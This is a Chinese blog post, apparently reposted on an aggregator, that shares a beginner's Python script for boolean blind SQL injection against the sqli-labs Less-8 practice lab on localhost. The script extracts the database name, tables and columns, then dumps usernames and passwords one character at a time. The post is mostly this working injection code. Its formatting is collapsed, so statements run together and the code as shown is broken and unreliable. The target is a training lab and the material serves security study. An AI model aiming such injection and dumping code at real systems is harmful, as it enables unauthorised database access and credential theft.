sqli-labs_less8 布尔盲注脚本

news/2025/11/2 22:33:05/文章来源:https://www.cnblogs.com/before0428/p/19185563

在我大一第一个寒假,从纯小白入门时在高铁上激情写出来的,适合新手学习,逻辑很简单,能锻炼你的初步代码能力和对sql注入的理解与利用,写完会有很大的成就感,make you confident

import requests
import stringurl='http://127.0.0.1/sqli/Less-8/'i=0
db_name_len=0
print('[+]正在猜解数据库长度......')
while True:payload=url+"?id=1'and length(database())=%d--+"%ires=requests.get(payload)#print(payload)if 'You are in...........' in res.text:db_name_len=iprint ('数据库长度为:'+str(db_name_len))breakif i==30:print('error!')breaki+=1print("[+]正在猜解数据库名字......")
db_name=''
for i in range(1,db_name_len+1):#print(i)for k in string.ascii_lowercase:#print(k)payload=url+"?id=1'and substr(database(),%d,1)='%s'--+"%(i,k)res=requests.get(payload)#print(payload)if 'You are in...........' in res.text:db_name+=k#print(db_name)break
print("数据库为: %s"%db_name)#猜解几张表
print("[+]正在猜解表的数量......")
tab_num=0
while True:payload=url+"?id=1'and (select count(table_name) from information_schema.tables where table_schema='security')=%d--+"%tab_numres=requests.get(payload)if 'You are in...........' in res.text:print("%s数据库共有"%db_name+str(tab_num)+"张表")breakelse:tab_num+=1print("[+]开始猜解表名......")
for i in range(1,tab_num+1):tab_len=0while True:payload=url+"?id=1'and (select length(table_name) from information_schema.tables where table_schema='security' limit %d,1)=%d--+"%(i-1,tab_len)res=requests.get(payload)#print(payload)if 'You are in...........' in res.text:#print ('第%d张表长度为:'%i+str(tab_len))breakif tab_len==30:print('error!')breaktab_len+=1tab_name=''for j in range(1,tab_len+1):for m in string.ascii_lowercase:payload=url+"?id=1'and substr((select table_name from information_schema.tables where table_schema='security' limit %d,1),%d,1)='%s'--+"%(i-1,j,m)res=requests.get(payload)if 'You are in...........' in res.text:tab_name+=m#print (tab_name)print("[-]第%d张表名为: %s"%(i,tab_name))#尝试猜解表下字段......dump_num=0while True:payload=url+"?id=1'and (select count(column_name) from information_schema.columns where table_name='%s')=%d--+"%(tab_name,dump_num)res=requests.get(payload)if 'You are in...........' in res.text:print("%s表下有%d个字段"%(tab_name,dump_num))breakdump_num+=1for a in range(1,dump_num+1):dump_len=0while True:payload=url+"?id=1'and (select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)=%d--+"%(tab_name,a-1,dump_len)      res=requests.get(payload)#print(payload)if 'You are in...........' in res.text:#print("第%d个字段长度为%d"%(a,dump_len))breakdump_len+=1if dump_len==30:print("error!!")breakdump_name=''for i in range(1,dump_len+1):for j in (string.ascii_lowercase+'_-'):payload=url+"?id=1'and substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1)='%s'--+"%(tab_name,a-1,i,j)res=requests.get(payload)if 'You are in...........' in res.text:dump_name+=j#print(dump_name)breakprint(dump_name)
print("[+]开始猜解users表下的username......")
usn_num=0
char="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-"
while True:payload=url+"?id=1'and (select count(username) from security.users)=%d--+"%usn_numres=requests.get(payload)if "You are in" in res.text:#print(usn_num)#13breakusn_num+=1
for i in range(1,usn_num+1):usn_len=0while True:payload=url+"?id=1'and (select length(username) from security.users limit %d,1)=%d--+"%(i-1,usn_len)res=requests.get(payload)if "You are in" in res.text:#print("第%d的长度为%d"%(i,usn_len))breakusn_len+=1usr_name=''for k in range(1,usn_len+1):for m in char:payload=url+"?id=1'and substr((select username from security.users limit %d,1),%d,1)='%s'--+"%(i-1,k,m)res = requests.get(payload)if "You are in" in res.text:usr_name+=mbreakprint(usr_name)print("[+]开始猜解users表下的password......")
usn_num=0
char="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-@!"
while True:payload=url+"?id=1'and (select count(password) from security.users)=%d--+"%usn_numres=requests.get(payload)if "You are in" in res.text:#print(usn_num)#13breakusn_num+=1
for i in range(1,usn_num+1):usn_len=0while True:payload=url+"?id=1'and (select length(password) from security.users limit %d,1)=%d--+"%(i-1,usn_len)res=requests.get(payload)if "You are in" in res.text:#print("第%d的长度为%d"%(i,usn_len))breakusn_len+=1usr_name=''for k in range(1,usn_len+1):for m in char:payload=url+"?id=1'and substr((select password from security.users limit %d,1),%d,1)='%s'--+"%(i-1,k,m)res = requests.get(payload)if "You are in" in res.text:usr_name+=mbreakprint(usr_name)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/953853.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

ST产品型号解析

ST产品型号解析

提供ST产品型号命名方式STM32 & STM8 产品型号STM32MPU产品型号
阅读更多...
【Shell脚本】 目录清理脚本

【Shell脚本】 目录清理脚本

以下是一个满足需求的 Linux 自动化监控与执行脚本,包含详细注释和容错处理,可直接部署使用。脚本完整代码(opt_monitor_cleanup.sh)#!/bin/bash ##############################################################…
阅读更多...
第一次团队作业

第一次团队作业

第一次团队作业 1.团队名称和这个名称的原因 2.团队姓名和学号学号 姓名3123003122 齐思贤3123004192 彭文昊3123002353 袁镇清3123002127 谢嘉骏31230042203 张嘉铭3123004185 林旭坚3223004639 阿丽亚阿不来海提3.团…
阅读更多...
题解:CF1975E Chain Queries

题解:CF1975E Chain Queries

题意 给定一棵 \(n\) 个结点的树,第 \(i\) 个点有颜色 \(c_i\),其中 \(c_i=0\) 为白色,\(c_i=1\) 为黑色。有 \(q\) 次询问,每次询问给定一个正整数 \(u\),要求将结点 \(u\) 的颜色反转,并判断修改后的树上的所有…
阅读更多...
题解:P4895 独钓寒江雪

题解:P4895 独钓寒江雪

题意 给定一棵无根树,求其中本质不同的独立集的个数。 思路 首先,由于要求统计独立集的个数,所以我们选定的点不能相邻。考虑 dp,设 \(f_{i,0}\) 表示 \(i\) 的子树内不选 \(i\) 的独立集个数,\(f_{i,1}\) 表示 \…
阅读更多...
题解:P7201 [COCI 2019/2020 #1] Džumbus

题解:P7201 [COCI 2019/2020 #1] Džumbus

题意 简化版题意:给定一个森林,所有节点初始为白色,可以花费 \(D_i\) 将第 \(i\) 个节点染成黑色。定义一个节点如果是黑色节点,且与它直接相连的点中有黑色节点,则这个点是“好的”。有 \(Q\) 个询问,每次询问在…
阅读更多...
题解:CF913D Too Easy Problems

题解:CF913D Too Easy Problems

首先,显然不得分的题目不做,因为这样不仅增加时间,还可能导致一些原来符合限制的题目不符合限制,不能使答案更优。 于是,我们发现最终的答案 \(ans\) 不会超过所选题目中最小的 \(t_i\),所以我们选题时应该尽量选…
阅读更多...
题解:CF875C National Property

题解:CF875C National Property

大致题意:给定一些字符串,字符串中的字母开始时均为小写,你可以将其中若干种字母全部改为大写,问能否使得操作后给定的字符串满足按字典序升序(可以等于)排列。如果能,则输出方案。 这里提供一个拓扑排序的解法…
阅读更多...
题解:CF1037E Trips

题解:CF1037E Trips

题意 一共有 \(n\) 个人,他们开始互不认识,而每天早上不认识的两个人会变成朋友。一共有 \(m\) 天,每天晚上有的人要去旅行,去旅行的人必须满足有至少 \(k\) 个朋友也去旅行。求每天去旅行的最大人数。 思路读题后…
阅读更多...
lecms在使用redis中设置他缓存时间

lecms在使用redis中设置他缓存时间

lecms在使用redis中设置他缓存时间,默认的都是永久缓存,如果数据过大,会导致内存损耗太严重,所以要修改他缓存时间,比如我设置为缓存24个小时,即为86400秒 第一步:找到lecms/xiunophp/cache/cache_redis.class.…
阅读更多...
题解:CF387E George and Cards

题解:CF387E George and Cards

首先思路是很清晰的,该删的数从小到大开始删,这样在删到当前数的时候,比当前数小的数可以尽量少,能选的区间自然就更大了。 考虑如何实现,维护一个 set,从小到大遍历每个数,若当前数不需要被删除,就将其下标加…
阅读更多...
博客一年纪

博客一年纪

题记:千里之行,始于足下从想写 UEFI Blog 到真的发布我第一篇 Blog 当中隔了 “好些年” 第一篇 UEFI Blog - UEFI 笔记 001 — 什么是 ACPI method今天打开 Blog 突然发现,从第一篇 UEFI Blog 到现在(又)已经过去…
阅读更多...
题解:AT_abc307_f [ABC307F] Virus 2

题解:AT_abc307_f [ABC307F] Virus 2

思路 考虑模拟传染过程,对于每一个已经被感染的点(下文称为当前点),遍历其能到达的点(下文称为新点),记这条边的边权为 \(w\),分为以下两步:判断新点能否和当前点在同一天内被感染;若不能,则从当前点被感染…
阅读更多...
题解:CF291E Tree-String Problem

题解:CF291E Tree-String Problem

题意 给定一棵树,树的边上有字符串,字符串可以按照由父亲到儿子的方向拼接,求模式串 \(t\) 出现的次数。 思路 直接使用哈希。提前预处理出模式串 \(t\) 对应的哈希值,在搜索时计算当前点到儿子之间的边上的字符串…
阅读更多...
java操作sip

java操作sip

1|0一、基础理论介绍 1|11.1 sip的主要功能 SIP的主要功能是允许用户或设备通过消息传递来产生互动,这些消息可以满足以下四种目的:用户向系统注册; 邀请用户参加互动会议; 协商会议媒体内容的格式; 建立两端点或…
阅读更多...
CH59X/CH58X蓝牙主机设置白名单

CH59X/CH58X蓝牙主机设置白名单

可以通过白名单只扫描、连接特定的蓝牙设备(白名单中列出的)。 一、首先将白名单使能,通过宏开启// TRUE to use white list during discovery #define DEFAULT_DISCOVERY_WHITE_LIST 1//FALSE// TRUE to us…
阅读更多...
题解:CF712D Memory and Scores

题解:CF712D Memory and Scores

题意 有两个整数 \(a,b\),进行 \(t\) 轮操作,每轮操作先在 \([-k,k]\) 范围内取一个整数加到 \(a\) 中,再在 \([-k,k]\) 范围内取一个整数加到 \(b\) 中,求最终使 \(a > b\) 的方案数。 思路 记 \(a\) 增加的总…
阅读更多...
思维的断章,觉知的永恒:一个基于“内观照叙事模型”的认知革命与跨学科范式重构

思维的断章,觉知的永恒:一个基于“内观照叙事模型”的认知革命与跨学科范式重构

思维的断章,觉知的永恒:一个基于“内观照叙事模型”的认知革命与跨学科范式重构 笔者:岐金兰 日期:2025年11月2日 摘要 本文基于《一个灵感:思维的断章——内观照中的叙事》所提出的“觉知背景场思维模型”,进行…
阅读更多...
拾壹月贰

拾壹月贰

csp 总结 发现解压密码是滕王阁序? 有点进步但没啥用(没体现在分数上,进步太小) \(T1\) 想到反悔贪心但是思路过于复杂,维护的东西太多,下次对于这种第一题(绿),可以慢点想想有没有简化的思路, 故赛时写了 \…
阅读更多...
struct page

struct page

/** 系统中的每一个物理页(physical page)都对应一个 struct page 结构,* 用于追踪该页当前的用途。注意,我们无法追踪哪些任务(task)* 正在使用这个页;但如果该页是一个 pagecache 页面,* 我们可以通过 rmap(…
阅读更多...
最新文章

Copyright @ 2022~2023